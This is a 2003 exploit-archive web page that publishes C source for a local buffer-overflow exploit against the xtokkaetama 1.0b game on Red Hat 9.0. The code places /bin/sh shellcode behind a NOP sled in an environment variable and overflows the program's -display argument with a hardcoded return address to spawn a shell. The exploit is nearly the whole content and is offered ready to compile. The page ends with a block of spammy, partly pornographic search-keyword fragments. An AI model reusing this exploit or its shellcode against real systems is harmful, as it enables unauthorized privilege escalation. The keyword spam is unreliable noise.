about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , xtokkaetama 1.0b local game exploit on Red Hat 9.0



2003-08-01 xtokkaetama 1.0b local game exploit on Red Hat 9.0
/*
* xtokkaetama 1.0b local game exploit on Red Hat 9.0
* Coded by brahma (31/07/2003)
*
* http://www.debian.org/security/2003/dsa-356
*/


#include <stdlib.h>
#define RETADDR 0xbfffff11 
#define DEFAULT_BUFFER_SIZE 29
#define DEFAULT_EGG_SIZE 512 
#define NOP 0x90
#define BIN "/usr/X11R6/bin/xtokkaetama" 
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) eggsize = atoi(argv[2]);


if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}

addr = RETADDR; 
printf("Using address: 0x%x\n", addr);

ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);
putenv(egg);
execl(BIN,BIN,"-display",buff,NULL);
}


securitydot.net - 2003-08-01

Advertising

Copyright 2007, SecurityDot
Mon, 14 Dec 2009 22:01:06 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
photo sxe mayasex sex vidieo trisha tta Breastphot rapidleech allinurl: Sexywalpap sexfucky.v sex shemal audult fil www.3gp.co G...dat/sa indian sex NUDEboolyw www.trisha Pornogroph cert Www.sexani Www.pinkwo WAP.OVOA.C Nude pics boboqiu.co Wwwe sex wwwhun.com bindshell www.ku6txt www.taotao italino se imsend www.za3ror WWW.ARABIC Cold www.malaya zhuoqin.cq www sex fu index.asp pictuerhot 07775000 Lotus Domi Culos Muvies sf linux ker Foto ratu far cry Mom and da deshi baba NUDEboolyw www.309809 www.cm89